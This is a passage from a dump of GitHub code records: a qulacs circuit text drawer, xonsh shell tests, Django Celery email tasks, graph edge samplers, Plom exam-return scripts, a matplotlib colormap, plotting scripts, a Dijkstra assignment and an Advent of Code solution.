\"|\":\n # ぶつかったのは通常のゲートの幅の左壁だったので, ゲートの右側まで抜ける\n # 現在位置pは(左壁の位置-1)で+5すれば現在地は右壁の\"|\"になる\n # そして最後のインクリメントで右壁の次にいく\n p += 5\n elif self.circuit_picture[row][p + 3] == \"|\":\n # ぶつかったのは離れたqubitにかかるゲート用の壁(幅の狭いゲート)の左壁だった\n # +3すれば現在地は右壁の\"|\"になるので, 最後のインクリメントで右壁の次にいく\n p += 3\n else:\n # 読んでみるとゲートの右の壁でない => 読んだのはコントロールユニタリの縦線だった\n # なので次の空白を\"-\"とする\n # \"|\"を\"+\"に書き換えワイヤーがクロスする表示も試したが,\n # どこが制御qubitかわかりにくかったのでやめた.\n self.circuit_picture[row][p + 2] = \"-\"\n # 次に読む文字を今変更した\"-\"にするために調整\n p += 1\n # インクリメントして次の文字の位置をセット\n p += 1\n # もしインクリメントしたときに配列のサイズを超えたら終了\n if p + 1 == self.horizontal_size:\n break\n\n\ndef draw_circuit(\n circuit: QuantumCircuit, verbose: bool = False, dot: str = \"large\"\n) -> None:\n \"\"\"\n 量子回路図をテキストで出力するための関数\n\n Parameters\n ----------\n circuit: qulacs.QuantumCircuit\n 出力したい量子回路(qulacs.QuantumCircuit)\n verbose: bool\n 詳細出力(default=False). Trueのときはgateにcircuitに追加された順番が出力される\n dot: str\n 制御qubitを表すドットのスタイル(default=\"large\")\n \"\"\"\n\n Drawer = TextCircuitDrawer(circuit, dot=dot)\n Drawer.draw(verbose=verbose)\n","repo_name":"Qulacs-Osaka/qulacs-visualizer","sub_path":"qulacsvis/visualization/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":34165,"program_lang":"python","lang":"ja","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"73041962933","text":"# -*- coding: utf-8 -*-\n\"\"\"(A down payment on) Testing for ``xonsh.base_shell.BaseShell`` and associated classes\"\"\"\nimport os\n\nfrom xonsh.environ import Env\nfrom xonsh.base_shell import BaseShell\nfrom xonsh.shell import transform_command\n\n\ndef test_pwd_tracks_cwd(xonsh_builtins, xonsh_execer, tmpdir_factory, monkeypatch ):\n asubdir = str(tmpdir_factory.mktemp(\"asubdir\"))\n cur_wd = os.getcwd()\n xonsh_builtins.__xonsh_env__ = Env(PWD=cur_wd, XONSH_CACHE_SCRIPTS=False, XONSH_CACHE_EVERYTHING=False)\n\n monkeypatch.setattr(xonsh_execer, \"cacheall\", False, raising=False)\n bc = BaseShell(xonsh_execer, None)\n\n assert os.getcwd() == cur_wd\n\n bc.default('os.chdir(r\"' + asubdir + '\")')\n\n assert os.path.abspath(os.getcwd()) == os.path.abspath(asubdir)\n assert os.path.abspath(os.getcwd()) == os.path.abspath(xonsh_builtins.__xonsh_env__['PWD'])\n assert 'OLDPWD' in xonsh_builtins.__xonsh_env__\n assert os.path.abspath(cur_wd) == os.path.abspath(xonsh_builtins.__xonsh_env__['OLDPWD'])\n\n\ndef test_transform(xonsh_builtins):\n @xonsh_builtins.events.on_transform_command\n def spam2egg(cmd, **_):\n if cmd == 'spam':\n return 'egg'\n else:\n return cmd\n\n assert transform_command('spam') == 'egg'\n assert transform_command('egg') == 'egg'\n assert transform_command('foo') == 'foo'\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/xonsh_xonsh/xonsh-master/tests/test_base_shell.py","file_name":"test_base_shell.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4175746660","text":"from django.contrib.auth import get_user_model\n\nfrom config.celery import app\nfrom django.core.mail import send_mail\n\nUser = get_user_model()\n\nusers = User.objects.all()\n\n@app.task\ndef send_spam():\n send_mail(\n 'Здравствуйте, Вас приветствует courses.kg',\n 'Мы рады что вы с нами!',\n 'musabekova.amina13@gmail.com',\n [user.email for user in users]\n )\n\n@app.task\ndef send_notifications_about_new_course(course_title):\n \"\"\"Рассылка уведомлений о новых курсах для всех пользователей\"\"\"\n send_mail(\n 'Спам',\n f'Привет, опубликован новый курс! {course_title}',\n 'musabekova.amina13@gmail.com',\n [user.email for user in users]\n )\n","repo_name":"aliiavgh/courses_team_hackathon","sub_path":"config/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25910446234","text":"from graphz.dataset import GraphDataset\nfrom graphz.utils import reservoir_sampling\nimport numpy as np\nimport random\nimport warnings\n\nclass EdgeSampler:\n \n def __init__(self, graph):\n self.graph = graph\n\n def sample(self, n_samples):\n raise NotImplementedError()\n\nclass PositiveEdgeSampler(EdgeSampler):\n\n def sample(self, n_samples):\n \"\"\"\n Samples from existing edges.\n \"\"\"\n # Precheck\n if n_samples > self.graph.n_edges:\n raise ValueError('Number of positive samples cannot be greater than the total number of edges.')\n # Sample positives using reservoir sampling\n x = reservoir_sampling(self.graph.get_edge_iter(), n_samples)\n if not self.graph.directed:\n # For undirected graphs, we randoms exchanges the order of the two\n # nodes in the tuple to prevent learners from exploiting the\n # ordering infomation. We want our learners to be able to predict\n # links for both (na, nb) and (nb, na) as they represent the same\n # edge in an undirected graph\n x = [(e[1], e[0], 1) if random.random() >= 0.5 else (e[0], e[1], 1) for e in x]\n else:\n x = [(e[0], e[1], 1) for e in x]\n return x\n\nclass NegativeEdgeSampler(EdgeSampler):\n\n def sample(self, n_samples, exclusions=None):\n \"\"\"\n Samples disconnected pairs (no self loops will be included).\n \"\"\"\n # Precheck\n max_n_neg = self.graph.get_max_n_edges()\n if n_samples > max_n_neg - self.graph.n_edges:\n raise ValueError('Too many negative samples requested.')\n # Check the network sparsity level\n sparsity_level = (self.graph.n_edges + n_samples) / max_n_neg\n if sparsity_level > 0.05:\n warnings.warn('Graph is not sparse enough. Random sampling may be slow.')\n x = []\n # Sample negatives randomly\n if exclusions is not None and len(exclusions) > 0:\n if self.graph.directed:\n sampled_pairs = set(map(lambda e: (e[0], e[1]), exclusions))\n else:\n # For undirected graphs, (na, nb) and (nb, na) are equivalent.\n sampled_pairs = set()\n for e in exclusions:\n if e[0] < e[1]:\n sampled_pairs.add((e[0], e[1]))\n else:\n sampled_pairs.add((e[1], e[0]))\n else: \n sampled_pairs = set()\n n_nodes = self.graph.n_nodes\n if self.graph.directed:\n for i in range(n_samples):\n while True:\n na = random.randint(0, n_nodes - 1)\n nb = random.randint(0, n_nodes - 1)\n if na == nb or (nb in self.graph.adj_list[na]) or ((na, nb) in sampled_pairs):\n continue\n x.append((na, nb, 0))\n sampled_pairs.add((na, nb))\n break\n else:\n for i in range(n_samples):\n while True:\n na = random.randint(0, n_nodes - 1)\n nb = random.randint(0, n_nodes - 1)\n # For undirected graphs, (na, nb) and (nb, na) correspond\n # to the same edge when na != nb.\n if na == nb:\n # Ensure that na < nb when recording (na, nb) in sampled\n # pairs so we won't sample an edge twice.\n continue\n if na > nb:\n na, nb = nb, na\n if (nb in self.graph.adj_list[na]) or ((na, nb) in sampled_pairs):\n continue\n # We randomly exchange na and nb here to prevent learners to\n # exploit the fact that na < nb.\n if random.random() >= 0.5:\n x.append((na, nb, 0))\n else:\n x.append((nb, na, 0))\n # When recording sampled pairs, always ensure that na < nb.\n sampled_pairs.add((na, nb))\n break\n return x\n\nclass BalancedEdgeSampler(EdgeSampler):\n\n def __init__(self, graph):\n \"\"\"\n An edge sampler that samples equal number of positive and negative edges.\n \"\"\"\n super().__init__(graph)\n self._pos_sampler = PositiveEdgeSampler(self.graph)\n self._neg_sampler = NegativeEdgeSampler(self.graph)\n\n def sample(self, n_samples):\n \"\"\"\n Samples edges.\n\n :returns: List of triplets (na, nb, is_connected)\n \"\"\"\n n_pos = n_samples // 2\n n_neg = n_samples - n_pos\n # Sample\n x_pos = self._pos_sampler.sample(n_pos)\n x_neg = self._neg_sampler.sample(n_neg)\n return x_pos + x_neg\n","repo_name":"morriswmz/graphz","sub_path":"graphz/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7995411992","text":"import html\nimport os\nimport sys\nimport shutil\nfrom pathlib import Path\n\n# actually BaseMessenger would work\nfrom plom.messenger import ManagerMessenger\nfrom plom.rules import isValidStudentNumber, StudentIDLength\nfrom plom.finish import CSVFilename\nfrom .return_tools import csv_add_return_codes\n\n\ndef do_renaming(fromdir, todir, sns):\n print(\"Searching for foo_.pdf files in {0}...\".format(fromdir))\n todir = Path(todir)\n fromdir = Path(fromdir)\n numfiles = 0\n for file in os.scandir(fromdir):\n if file.name.endswith(\".pdf\"):\n oldname = file.name.partition(\".\")[0]\n sn = oldname.split(\"_\")[-1]\n assert isValidStudentNumber(sn)\n code = sns[sn]\n newname = \"{0}_{1}.pdf\".format(oldname, code)\n newname = todir / newname\n print(\n ' found SN {0}: code {1}, copying \"{2}\" to \"{3}\"'.format(\n sn, code, file.name, newname\n )\n )\n shutil.copyfile(fromdir / file.name, newname)\n numfiles += 1\n return numfiles\n\n\ndef copy_soln_files(shortname, todir, sns):\n fromdir = Path(\"solutions\")\n todir = Path(todir)\n for sid in sns:\n fname = \"{}_solutions_{}.pdf\".format(shortname, sid)\n if os.path.isfile(fromdir / fname):\n shutil.copyfile(fromdir / fname, todir / fname)\n else:\n print(\"No solution file for student id = {}\".format(sid))\n\n\ndef make_coded_return_webpage(use_hex, digits, salt=None, server=None, solutions=False):\n \"\"\"Make the secret codes and the return-code webpage.\n\n Args:\n use_hex (bool): use random hex digits, otherwise an integer\n without leading zeros.\n digits (int): length of secret code.\n salt (str): instead of random, hash from student ID salted\n with this string. Defaults to None, which means do not\n do this, use random secret codes.\n solutions (bool): add a solutions link to the website\n server (str/None): server to contact or None for default\n (probably localhost).\n \"\"\"\n msgr = ManagerMessenger(server)\n msgr.start()\n\n spec = msgr.get_spec()\n # Can also get spec via filesystem\n # spec = SpecVerifier.load_verified()\n shortname = spec[\"name\"]\n longname = html.escape(spec[\"longName\"])\n codedReturnDir = Path(\"codedReturn\")\n\n reassembles = [\"reassembled\", \"reassembled_ID_but_not_marked\"]\n if os.path.isdir(reassembles[0]) and os.path.isdir(reassembles[1]):\n print('You have more than one \"reassembled*\" directory:')\n print(\" decide what you trying to do and run me again.\")\n sys.exit(2)\n elif os.path.isdir(reassembles[0]):\n fromdir = reassembles[0]\n elif os.path.isdir(reassembles[1]):\n fromdir = reassembles[1]\n else:\n print(\"I cannot find any of the dirs: \" + \", \".join(reassembles))\n print(\" Have you called the `reassemble` command yet?\")\n sys.exit(3)\n print('We will take pdf files from \"{0}\".'.format(fromdir))\n\n if codedReturnDir.exists() or os.path.exists(\"return_codes.csv\"):\n print(\n 'Directory \"{}\" and/or \"return_codes.csv\" already exist:\\n'\n \" if you want to re-run this script, delete them first.\".format(\n codedReturnDir\n )\n )\n sys.exit(4)\n os.makedirs(codedReturnDir)\n\n print(\"Generating return codes spreadsheet...\")\n if salt:\n print('Salt string \"{}\" can reproduce these return codes'.format(salt))\n else:\n print(\"These return codes will be random and non-reproducible\")\n sns = csv_add_return_codes(\n CSVFilename, \"return_codes.csv\", \"StudentID\", use_hex, digits, salt\n )\n print('The return codes are in \"return_codes.csv\"')\n\n numfiles = do_renaming(fromdir, codedReturnDir, sns)\n if numfiles > 0:\n print(\"Copied (and renamed) {0} files\".format(numfiles))\n else:\n print('no pdf files in \"{0}\"? Stopping!'.format(fromdir))\n sys.exit(5)\n # if solutions then copy across the solutions files\n if solutions:\n print(\"Copying solution files into place.\")\n copy_soln_files(shortname, codedReturnDir, sns)\n\n print(\"Adding index.html file\")\n if solutions:\n from .html_view_test_template import htmlsrc_w_solutions as htmlsrc\n else:\n from .html_view_test_template import htmlsrc\n\n htmlsrc = htmlsrc.replace(\"__COURSENAME__\", longname)\n htmlsrc = htmlsrc.replace(\"__TESTNAME__\", shortname)\n htmlsrc = htmlsrc.replace(\"__CODE_LENGTH__\", str(digits))\n htmlsrc = htmlsrc.replace(\"__SID_LENGTH__\", str(StudentIDLength))\n\n with open(codedReturnDir / \"index.html\", \"w\") as htmlfile:\n htmlfile.write(htmlsrc)\n\n print(\"All done! Next tasks:\")\n print(' * Copy \"{}\" to your webserver'.format(codedReturnDir))\n print(' * Privately communicate info from \"return_codes.csv\"')\n print(\" - E.g., see `contrib/plom-return_codes_to_canvas_csv.py`\")\n print(\" * Read docs about the security implications of all this.\")\n","repo_name":"plomgrading/plom","sub_path":"plom/finish/coded_return.py","file_name":"coded_return.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"28767511376","text":"# Excetpions handling: errors detected during execution are called exceptions.\n# To handle exceptions, we use try, catch, finally and else\n\n# def divide(a, b):\n# print(a/b)\n\n# divide(2,0)\n\n# print(\"other part working\")\n# print()\n\n\"\"\" execpting the error by giving the code a tries\ntry:\n x = 3 / 2\n #print(x)\nexcept ZeroDivisionError as e:\n print(\"Division by zero! the execption was\", e)\n #handle exceptions\n # x = 0\n pass\nfinally:\n print(\"the end\")\n\n\nprint(\"other part of code\")\n\"\"\"\n# try:\n# x = 5 / 0\n# print(x)\n# except ZeroDivisionError as e:\n# print(\"I got an error\")\n# raise # this for debug, raise the exception for the debugging purpose\n# finally:\n# print(\"The End\")\n\n# print(\"code runing perfectly\")\n\ntry:\n d = {}\n a = d[1]\n b = d.jrgeugnsa\nexcept (KeyError, AttributeError) as e: # or you can use the keyword: Exception\n print(\"A keyError and attribute error exception was caught!\")\n raise","repo_name":"ramiabukhader/Python-fundamentals","sub_path":"Python_Constructors/Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14459928531","text":"from __future__ import division\nimport scipy.interpolate\nfrom matplotlib import cm\nimport numpy as np\n\ndef bipolar(lutsize=256, n=0.333, interp=[]):\n \"\"\"\n Bipolar hot/cold colormap, with neutral central color.\n\n This colormap is meant for visualizing diverging data; positive\n and negative deviations from a central value. It is similar to a\n blackbody colormap for positive values, but with a complementary\n \"cold\" colormap for negative values.\n\n Parameters\n ----------\n lutsize : int\n The number of elements in the colormap lookup table. (Default is 256.)\n n : float\n The gray value for the neutral middle of the colormap. (Default is\n 1/3.)\n The colormap goes from cyan-blue-neutral-red-yellow if neutral\n is < 0.5, and from blue-cyan-neutral-yellow-red if neutral > 0.5.\n For shaded 3D surfaces, an `n` near 0.5 is better, because it\n minimizes luminance changes that would otherwise obscure shading cues\n for determining 3D structure.\n For 2D heat maps, an `n` near the 0 or 1 extremes is better, for\n maximizing luminance change and showing details of the data.\n interp : str or int, optional\n Specifies the type of interpolation.\n ('linear', 'nearest', 'zero', 'slinear', 'quadratic, 'cubic')\n or as an integer specifying the order of the spline interpolator\n to use. Default is 'linear'. See `scipy.interpolate.interp1d`.\n\n Returns\n -------\n out : matplotlib.colors.LinearSegmentedColormap\n The resulting colormap object\n\n Notes\n -----\n If neutral is exactly 0.5, then a map which yields a linear increase in\n intensity when converted to grayscale is produced. This colormap should\n also be reasonably good\n for colorblind viewers, as it avoids green and is predominantly based on\n the purple-yellow pairing which is easily discriminated by the two common\n types of colorblindness. [2]_\n\n Examples\n --------\n >>> from mpl_toolkits.mplot3d import Axes3D\n >>> from matplotlib import cm\n >>> import matplotlib.pyplot as plt\n >>> import numpy as np\n\n >>> fig = plt.figure()\n >>> ax = fig.gca(projection='3d')\n >>> x = y = np.arange(-4, 4, 0.15)\n >>> x, y = np.meshgrid(x, y)\n >>> z = (1- x/2 + x**5 + y**3)*exp(-x**2-y**2)\n >>> surf = ax.plot_surface(x, y, z, rstride=1, cstride=1, linewidth=0.1,\n >>> vmax=abs(z).max(), vmin=-abs(z).max())\n >>> fig.colorbar(surf)\n >>> plt.show()\n >>> set_cmap(bipolar(201))\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.1)) # dark gray as neutral\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.9)) # light gray as neutral\n >>> waitforbuttonpress()\n >>> set_cmap(bipolar(201, 0.5)) # grayscale-friendly colormap\n\n References\n ----------\n .. [1] Lehmann Manja, Crutch SJ, Ridgway GR et al. \"Cortical thickness\n and voxel-based morphometry in posterior cortical atrophy and typical\n Alzheimer's disease\", Neurobiology of Aging, 2009,\n doi:10.1016/j.neurobiolaging.2009.08.017\n .. [2] Brewer, Cynthia A., \"Guidelines for Selecting Colors for\n Diverging Schemes on Maps\", The Cartographic Journal, Volume 33,\n Number 2, December 1996, pp. 79-86(8)\n http://www.ingentaconnect.com/content/maney/caj/1996/00000033/00000002/art00002\n\n \"\"\"\n if n < 0.5:\n if not interp:\n interp = 'linear' # seems to work well with dark neutral colors cyan-blue-dark-red-yellow\n\n _data = (\n (0, 1, 1), # cyan\n (0, 0, 1), # blue\n (n, n, n), # dark neutral\n (1, 0, 0), # red\n (1, 1, 0), # yellow\n )\n elif n >= 0.5:\n if not interp:\n interp = 'cubic' # seems to work better with bright neutral colors blue-cyan-light-yellow-red\n # produces bright yellow or cyan rings otherwise\n\n _data = (\n (0, 0, 1), # blue\n (0, 1, 1), # cyan\n (n, n, n), # light neutral\n (1, 1, 0), # yellow\n (1, 0, 0), # red\n )\n else:\n raise ValueError('n must be 0.0 < n < 1.0')\n\n xi = np.linspace(0, 1, np.size(_data, 0))\n cm_interp = scipy.interpolate.interp1d(xi, _data, axis=0, kind=interp)\n xnew = np.linspace(0, 1, lutsize)\n ynew = cm_interp(xnew)\n\n # No form of interpolation works without this, but that means the interpolations are not working right.\n ynew = np.clip(ynew, 0, 1)\n\n return cm.colors.LinearSegmentedColormap.from_list('bipolar', ynew, lutsize)\n\nif __name__ == \"__main__\":\n\n from pylab import *\n\n def func3(x,y):\n return (1- x/2 + x**5 + y**3)*exp(-x**2-y**2)\n\n # make these smaller to increase the resolution\n dx, dy = 0.05, 0.05\n\n x = arange(-3.0, 3.0001, dx)\n y = arange(-3.0, 3.0001, dy)\n X,Y = meshgrid(x, y)\n\n Z = func3(X, Y)\n pcolor(X, Y, Z, cmap=bipolar(n=1./3, interp='linear'), vmax=abs(Z).max(), vmin=-abs(Z).max())\n colorbar()\n axis([-3,3,-3,3])\n\n show()\n","repo_name":"LSSTDESC/chroma","sub_path":"chroma/bipolar.py","file_name":"bipolar.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"34598070153","text":"# Program to:\n# (1) make Fisher wave plots,\n# (2) calculate speed of wavefront\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n# arguments from command line\nimport sys\n# for round_sig() method\nfrom math import log10, floor\n\n\ndef round_sig(x, sig):\n ''' Method to round to specified sig figs '''\n return round(x, sig-int(floor(log10(x)))-1)\n\n\n\n# Arbitrary well occupancy for mid-point of wave \nn_star = 0.5\n\n# Plot Fisher wave for every \"time_gap\" number of data points\ntime_gap = 1\n\n\n\nfig = plt.figure()\ntitle = \"Fisher waves\"\nfig.suptitle(title, fontsize=32)\nplt.xlabel('Well', fontsize=26); plt.ylabel('Well population', fontsize=26)\nplt.tick_params(axis='both', which='major', labelsize=20)\nplt.ylim((0,1.2))\n\n#plt.yscale('log')\n\n\nfilename = str(sys.argv[1])\nf = open( filename, 'r' )\n\n# Store absolute time intervals between colonisation of wells\nabsolute_ints = []\n# and the absolute times\nabs_times = []\n\nwell = 1\nwave_front = 1\nline_num = 0\n\nfor line in f:\n\n # Read in line as list of floats\n columns = [ float(x) for x in line.split()]\n # Number of wells (first column=time, all rest are wells)\n nwells = len(columns)-1\n\n\n # For generating gradient plot of speed --------------------\n if (wave_front < nwells and columns[ wave_front ] > n_star ):\n abs_times.append( (wave_front, columns[0]) )\n wave_front += 1\n # ----------------------------------------------------------\n\n\n # --- For plot of Fisher waves ---------------------------------\n line_num += 1\n if (line_num % time_gap == 0 ):\n\n time = columns[0]\n columns.pop(0)\n \n w = 0\n wells = []\n populations = []\n for i in columns:\n wells.append(w)\n w += 1\n populations.append( i )\n\n lbl = str(int(time))+\" hours\"\n plt.plot( wells, populations, linewidth='4', label=lbl )\n\n #---------------------------------------------------------------\n\n\nplt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.)\n\n\n\n\n\n###################### PLOTTING SPEED OF WAVEFRONT ############################################\nfig2 = plt.figure()\ntitle = \"Position of wavefront vs time\"\nfig2.suptitle(title, fontsize=34)\nplt.xlabel('t( N(well) > N* ) [hours]', fontsize=26); plt.ylabel('Well', fontsize=26)\nplt.tick_params(axis='both', which='major', labelsize=20)\n\n\n# Make column scatter plot of \"well vs #PMs\" for all detectable PMs\nw=[]; t=[];\n\nabs_times.pop(0) # Ignore first 2 data points or we see dependence on initial population size\nabs_times.pop(0)\n\nfor (a,b) in abs_times:\n w.append(a); t.append(b);\n\n# Calculate slope of plot using numpy polyfit()\nslope, intercept = np.polyfit( t, w, 1 )\nspeed = round_sig( slope, 3 )\n\ntext=\"Speed = \"+str(speed)+\" wells/h\"\nplt.plot(t, w, linewidth='3')\n#plt.text(60, .025, r'$\\mu=100,\\ \\sigma=15$')\n#plt.text(int(len(abs_times)*0.2), int(len(abs_times)*0.9), text, fontsize=26)\nplt.text( (t[len(t)-1]*0.2), (w[len(w)-1]*0.9), text, fontsize=26)\n\n\nplt.show()\n################################################################################################\n\n\n\n\n\n\n\n\nexit(0)\n\n","repo_name":"Golpette/antibiotic-resistance","sub_path":"Data analysis scripts/plot_fisher_speed_DENSITY.py","file_name":"plot_fisher_speed_DENSITY.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74427916212","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n'''\nAssignment 3: Reliable Communications\n\nTeam Number:\nStudent Names:\n'''\nimport unittest\nimport sys\nimport math\nimport itertools\nimport heapq\nimport networkx as nx\n\"\"\"IMPORTANT:\nWe're using networkx only to provide a reliable graph\nobject. Your solution may NOT rely on the networkx implementation of\nany graph algorithms. You can use the node/edge creation functions to\ncreate test data, and you can access node lists, edge lists, adjacency\nlists, etc. DO NOT turn in a solution that uses a networkx\nimplementation of a graph traversal algorithm, as doing so will result\nin a score of 0.\n\"\"\"\n\ntry:\n import matplotlib.pyplot as plt\n HAVE_PLT = True\nexcept ImportError:\n HAVE_PLT = False\n\nclass PriorityQueue:\n \"\"\"Priority Queue\n\n An efficient priority queue implementation, as described in\n the heapq library of the python manual [1].\n\n [1]: http://docs.python.org/2/library/heapq.html#priority-queue-implementation-notes\n \"\"\"\n def __init__(self):\n self.pqueue = [] # list of entries arranged in a heap\n self.entry_finder = {} # mapping of tasks to entries\n self.REMOVED = '' # placeholder for a removed task\n self.counter = itertools.count() # unique sequence count\n\n def add_task(self, task, priority=0):\n 'Add a new task or update the priority of an existing task'\n if task in self.entry_finder:\n self.remove_task(task)\n count = next(self.counter)\n entry = [priority, count, task]\n self.entry_finder[task] = entry\n heapq.heappush(self.pqueue, entry)\n\n def remove_task(self, task):\n 'Mark an existing task as REMOVED. Raise KeyError if not found.'\n entry = self.entry_finder.pop(task)\n entry[-1] = self.REMOVED\n\n def pop_task(self):\n 'Remove and return the lowest priority task. Raise KeyError if empty.'\n while self.pqueue:\n priority, count, task = heapq.heappop(self.pqueue)\n if task is not self.REMOVED:\n del self.entry_finder[task]\n return task\n\n raise KeyError('pop from an empty priority queue')\n\n \"\"\"Auxiliary Functions\"\"\"\n def get_priority(self, task):\n \"\"\"\n Sig: integer ==> integer\n Pre: task is a task that exists in entry_finder\n Post:\n Example: pq.get_priority(5)==>10\n \"\"\"\n entry = self.entry_finder[task]\n return entry[0]\n\n def length(self):\n \"\"\"\n Sig: ==> integer\n Pre:\n Post:\n Example: pq.length()==>5\n \"\"\"\n return len(self.entry_finder)\n\n\ndef reliable(G, s, t):\n \"\"\"\n Sig: graph G(V,E), vertex, vertex ==> vertex[0..k]\n Pre:\n Post:\n Example: TestCase 1\n \"\"\"\n\n tovisit = PriorityQueue()\n pred = {}\n dist = {}\n pi = {}\n path = []\n\n #Perform Dijkstra's Algorithm\n for node in G.nodes():\n # Variant: len(G.nodes())-G.nodes().index(node)\n pred[node] = None\n if node != s:\n pi[node] = 1000000\n tovisit.add_task(node, pi[node])\n\n pi[s] = 0\n tovisit.add_task(s, pi[s])\n\n while tovisit.length()!=0:\n # Variant: tovisit.length()\n node = tovisit.pop_task()\n for neighbor in G.neighbors(node):\n #Avoid log(0)\n if G[node][neighbor]['fp']<1:\n l = pi[node] - math.log(1-G[node][neighbor]['fp'])\n elif G[node][neighbor]['fp']==1:\n l = 0\n if pi[neighbor] > l:\n tovisit.add_task(neighbor, l)\n pi[neighbor] = l\n pred[neighbor]=node\n\n #Reconstruct path\n node = t\n while node!=s:\n # Variant: len(G.edges())-len(path)\n path.insert(0, node)\n node = pred[node]\n path.insert(0, node)\n\n return path\n\n\nclass ReliableCommunicationsTest(unittest.TestCase):\n \"\"\"Test suite for the reliable communications problem\n \"\"\"\n def draw_mst(self, G, path, n):\n if not HAVE_PLT:\n return\n pos = nx.spring_layout(G) # positions for all nodes\n plt.subplot(120 + n)\n plt.title('Reliability %d' % n)\n plt.axis('off')\n # nodes\n nx.draw_networkx_nodes(G, pos, node_size = 700)\n # edges\n nx.draw_networkx_edges(G, pos, width = 6, alpha = 0.5,\n edge_color = 'b', style = 'dashed')\n from itertools import izip\n l = [(a, b) for a, b in izip(path[0:-1], path[1:])]\n T = nx.Graph()\n T.add_edges_from(l)\n nx.draw_networkx_edges(T, pos, width = 6)\n # labels\n nx.draw_networkx_labels(G, pos, font_size = 20, font_family = 'sans-serif')\n def test_sanity1(self):\n G = nx.Graph()\n G.add_edge('a', 'b', fp = 0.6)\n G.add_edge('a', 'c', fp = 0.2)\n G.add_edge('c', 'd', fp = 0.1)\n G.add_edge('c', 'e', fp = 0.7)\n G.add_edge('c', 'f', fp = 0.9)\n G.add_edge('a', 'd', fp = 0.3)\n path = reliable(G, 'b', 'f')\n self.assertEqual(path, ['b', 'a', 'c', 'f'], 'test 1 failed')\n #self.draw_mst(G, path, 1)\n\n def test_sanity2(self):\n G = nx.Graph()\n G.add_edge('a', 'b', fp = 0.6)\n G.add_edge('a', 'c', fp = 0.9)\n G.add_edge('c', 'd', fp = 0.1)\n G.add_edge('c', 'e', fp = 0.7)\n G.add_edge('c', 'f', fp = 0.9)\n G.add_edge('a', 'd', fp = 0.3)\n path = reliable(G, 'b', 'f')\n self.assertEqual(path, ['b', 'a', 'd', 'c', 'f'], 'test 2 failed')\n #self.draw_mst(G, path, 2)\n @classmethod\n def tearDownClass(cls):\n if HAVE_PLT:\n plt.show() # display\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lucatonile/AD","sub_path":"AD3/reliable_communications.py","file_name":"reliable_communications.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21179621242","text":"import requests\nfrom typing import Optional\nfrom config import BASE_URL, parser_logger\n\n\ndef get_page(page_path: str) -> Optional[str]:\n \"\"\"\n Запрос страницы с сайта bestchange.ru\n\n :param page_path: путь до страницы\n :type page_path: str\n :return: html-код страницы или ничего в случае ошибки\n :rtype: Optional[str]\n \"\"\"\n\n full_url = BASE_URL + page_path\n response = requests.get(full_url, timeout=5)\n if response.status_code == 200:\n return response.text\n else:\n parser_logger.error(f'Не удалось установить соединение со страницей. Статус ответа: {response.status_code}')\n raise requests.exceptions.ConnectionError\n","repo_name":"AlexSolokhin/bart_test_task","sub_path":"parser/get_bestchange.py","file_name":"get_bestchange.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33102559356","text":"import unittest\n\n# Paul Armstrong\n\ndef part_one(target_num):\n\t# Traverse the spiral to find the coordinates of the number. Spiral format:\n\t#\n\t#\t\t5 4 3\n\t#\t\t6 1 2\n\t#\t\t7 8 9\n\t#\n\tdirections = [[1,0], [0,1], [-1,0], [0,-1]]\n\tdir_change_count = 0\n\tposition = [0,0]\n\tpos_num = 1\n\twhile pos_num < target_num:\n\t\t# Perform ([number of direction changes] // 2 + 1) movements per direction\n\t\tfor t in range(0, (dir_change_count // 2) + 1):\n\t\t\tif (pos_num >= target_num):\n\t\t\t\tbreak\n\t\t\t# Move in the direction and add one to the position number\n\t\t\tposition[0] += directions[dir_change_count % 4][0]\n\t\t\tposition[1] += directions[dir_change_count % 4][1]\n\t\t\tpos_num += 1\n\n\t\t# Turn to the next direction\n\t\tdir_change_count += 1\n\t\t\n\t# Get the manhattan distance from the position\n\treturn abs(position[0]) + abs(position[1])\n\t\n\ndef part_two(target_num):\n\t# Use a map (dictionary) to build and traverse the spiral to find the next highest number.\n\t# In this sprial the position's number is the surrounding 8 numbers combined:\n\t#\n\t#\t\t5 4 2\n\t#\t\t10 1 1\n\t#\t\t11 23 25\n\t#\n\tspiral_dict = dict()\n\tspiral_dict[tuple([0,0])] = 1\n\tdirections = [[1,0], [0,1], [-1,0], [0,-1]]\n\tdir_change_count = 0\n\tposition = [0,0]\n\tpos_num = 1\n\twhile pos_num <= target_num:\n\t\t# Perform ([number of direction changes] // 2 + 1) movements per direction\n\t\tfor t in range(0, (dir_change_count // 2) + 1):\n\t\t\tif (pos_num > target_num):\n\t\t\t\tbreak\n\t\t\t# Move in the direction\n\t\t\tposition[0] += directions[dir_change_count % 